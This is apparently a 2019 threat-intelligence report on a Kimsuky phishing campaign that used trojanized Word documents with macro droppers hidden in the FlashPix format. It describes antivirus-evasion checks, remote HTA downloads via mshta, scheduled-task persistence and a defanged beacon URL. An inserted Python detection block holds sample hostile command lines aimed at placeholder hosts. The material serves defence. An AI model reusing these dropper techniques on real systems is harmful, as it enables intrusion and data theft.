Wednesday, September 11, 2019

Autumn Aperture Report

Autumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format  


Overview

In what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and increasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the need for vigilance around third-party relations. 

After detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear submarine program, and North Korean economic sanctions — Prevailion has determined the existence of a coordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have associated it — with moderate confidence — with the Kimsuky, a.k.a. “Smoke Screen”, threat actors. 

To increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts. The threat actors then appended their malware into these Microsoft Word files. Document metadata indicates that these operations occurred throughout the summer of 2019 with the most recent wave of documents likely being sent around 20 August 2019. 

This campaign also denoted an evolution in the threat actors’ techniques, as they shifted to more obscure file formats (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.

We hypothesize that these documents, sent via a socially engineered email, would have likely been anticipated by the intended victims, thus increasing the threat actors’ chance of success. Some document examples include:

  • Trojanizing a conference speaker’s notes after his presentation at the Nuclear Deterrence Summit.
  • Trojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile submarine (SSB) capabilities.
  • Impersonating the U.S. Department of Treasury and sending a renewal notice for a sanctions license. 

Autumn Aperture’s increasingly sophisticated tools still employ the use of a common email threat delivery mechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities targeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. 

Based on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if they are prompted to enable macros on any document. 

Technical Details

Trojanized Documents

The most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”. Document metadata shows that this document was created by a U.S. based university affiliate and, despite its title, was modified on 20 August by the threat actors. 

Consistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this campaign, when victims viewed the documents in an application, the malware would display a prompt to enable macros. Once macros were enabled, the document would then display the content — in this case, a report on the construction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional malware on the victim's computer. 


SSB phishing lure used to target victims

We also discovered another malicious document, likely deployed earlier this summer. This document used the same technique embedding images with instructions to enable macros. 

Once macros were enabled, the user would see a document that appeared to be from the U.S. Treasury Department, which granted the Carnegie Corporation of New York a sanctions license. As before, enabling macros allowed the malware to install additional payloads on the victim’s computer.


North Korea sanctions regulations lure

In one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly link was expanded, it revealed the actor-controlled URL behind it. Additionally, this expansion page showed how many people had clicked the link and when it was clicked. If a victim visited the URL, the resulting webpage would download a RAR archive, which contained a trojanized document summarizing a talk from the Nuclear Deterrence Summit.



While we observed multiple iterations of this lure, metadata shows that the original document was created by a speaker at the Nuclear Deterrence Summit and then modified by the threat actors. The content of this lure suggests that it was likely targeted towards conference attendees and/or others who had an interest in what took place at the conference. 

This particular document was previously referenced in a report by ESTSecurity, and its embedded domain was included in a report by the Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI). This indicates that the Autumn Aperture campaign was likely a continuation of a previously reported activity from this threat group.  


Nuclear Deterrence summit lure

Visual Basic Scripts and Kodak FlashPix Format Files

Earlier in 2019, the trojanized documents contained a very small, simple macro that would run automatically on open and then call mshta.exe to run an executable HTML (HTA) file. The threat actors have since fortified their documents with several new functionalities, such as an added feature to enumerate the host machine, and have experimented with password-protecting their documents.



Another feature would call Windows Management Instrumentation (WMI) to determine whether it was safe to obtain the next payload on the host machine. The dropper would obtain a list of running processes and services, then compare that output to a list of known anti-virus products. In July, the script would check for the presence of the following anti-virus products:
  • Malwarebytes
  • Windows Defender 
  • McAfee

In August, the threat actors added functionality to also check for: 
  • Sophos
  • TrendMicro

Screenshot of the anti-detection checks used in the July Campaign

Once the dropper determined that it was safe to run on the host machine, it would perform some host-based enumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe to obtain the HTA payloads hosted on compromised domains. The retrieved payload would be saved as %APPDATA%\tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.

The last new feature of the script would attempt to obtain the application’s version number — in most cases this would likely be the version of Microsoft Word — and then send the result to another actor-compromised domain, pirha[.]net/p/php?op=[version number].


Screenshot of the application version feature
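The dropper chain described above (an Office application launching mshta.exe against a remote HTA, a scheduled task running wscript.exe on a .bat file under %APPDATA%, and the version beacon with an `op=` query string) can be expressed as a few host-telemetry rules. The following is an added detection example, not code from the report or from Prevailion; the events are constructed, the Sysmon-style field names (`parent`, `image`, `cmdline`, `url`) are assumptions, and the hosts are placeholders.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample events (assumed Sysmon-style field names, not real telemetry).
# Benign rows are included so the rules can be checked against false positives.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"kind": "process", "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "https://hta-host.example/js/Payload0.hta"'},   # placeholder host
    {"kind": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 30 /tn Update '
                r'/tr "wscript.exe C:\Users\v\AppData\Roaming\tmp0.bat"'},
    {"kind": "network", "image": r"C:\Windows\System32\mshta.exe",
     "url": "https://beacon-host.example/1.php?op=16.0.11929.20300"},       # placeholder host
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",                # benign: Word opened normally
     "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\v\Documents\report.docx"'},
    {"kind": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "url": "https://news.example/index.php?op=view"},                       # benign: non-numeric op=
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev: Dict[str, str]) -> bool:
    """Office parent process launching a script host (the macro's first action)."""
    return (ev.get("kind") == "process" and _basename(ev.get("parent", "")) in OFFICE_APPS
            and _basename(ev.get("image", "")) in SCRIPT_HOSTS)


def mshta_remote_hta(ev: Dict[str, str]) -> bool:
    """mshta.exe asked to fetch an .hta over HTTP(S) rather than run a local file."""
    return (ev.get("kind") == "process" and _basename(ev.get("image", "")) == "mshta.exe"
            and re.search(r"https?://\S+\.hta\b", ev.get("cmdline", ""), re.I) is not None)


def schtask_wscript_appdata(ev: Dict[str, str]) -> bool:
    """Scheduled task created to run wscript.exe on a .bat under %APPDATA%."""
    cl = ev.get("cmdline", "").lower()
    return (ev.get("kind") == "process" and _basename(ev.get("image", "")) == "schtasks.exe"
            and "/create" in cl and "wscript.exe" in cl
            and re.search(r'(%appdata%|appdata\\roaming)\\[^"\s]*\.bat', cl) is not None)


def version_beacon(ev: Dict[str, str]) -> bool:
    """Script host posting a dotted version number to a php endpoint via op=."""
    return (ev.get("kind") == "network" and _basename(ev.get("image", "")) in SCRIPT_HOSTS
            and re.search(r"php\?op=\d+(?:\.\d+)+", ev.get("url", "")) is not None)


RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    ("office_spawns_script_host", office_spawns_script_host),
    ("mshta_remote_hta", mshta_remote_hta),
    ("schtask_wscript_appdata", schtask_wscript_appdata),
    ("version_beacon", version_beacon),
]


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]
```

Any one rule alone is noisy on a busy estate; the useful signal is two or more of them firing on the same host within a short window, which is how the chain above reads in telemetry.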

To hide this new functionality, the threat actor embedded it in the Kodak FlashPix file format (FPX). According to VirusTotal testing, the FPX file format has a significantly lower detection rate: the initial detection rate dropped to 8/57 AV products, whereas the standard VBA file format had an initial detection rate of 23/57.


Screenshot of the FPX detection rate on 23 July 2019


Screenshot of the VBA detection rate on 9 June 2019

This was likely done because AV products have numerous signatures designed to inspect VBA files, while FPX files have not received the same level of scrutiny. As a result, FPX files are less likely to be subsequently flagged as malicious. We found samples suggesting that the threat actors have been using this file format since at least July.

Conclusion 

These threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of operation did require some user interaction (pressing the macro button), the malware would do the rest in the background, hidden from the victim. 

This technique followed a wider trend that we are observing across multiple threat actor groups, in which they socially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust droppers to better protect their tool sets and increase their chances of operating without discovery. These changes reflect a highly motivated threat actor, likely to continue performing operations.

While the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple but effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery method used for campaign Autumn Aperture — is the leading driver for insurance giant AIG’s Europe, Middle East & Africa (EMEA) region cyber insurance claims. 

BEC incidents are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates that a wide range of sectors are vulnerable to BEC attacks, with professional services, financial services, business services, and public entity & non-profit industries accounting for almost 60% of all 2018 claims.  

Given the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of compromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if prompted to enable macros on a downloaded document. For more information about threat modeling and third-party risk mitigation, attend Elizabeth’s talk on September 12th at the Tactical Edges International CISOs Summit. (1)

(1) Cyber Claims: GDPR and business email compromise drive greater frequencies; https://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf


Indicators of Compromise 




About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit prevailion.com.

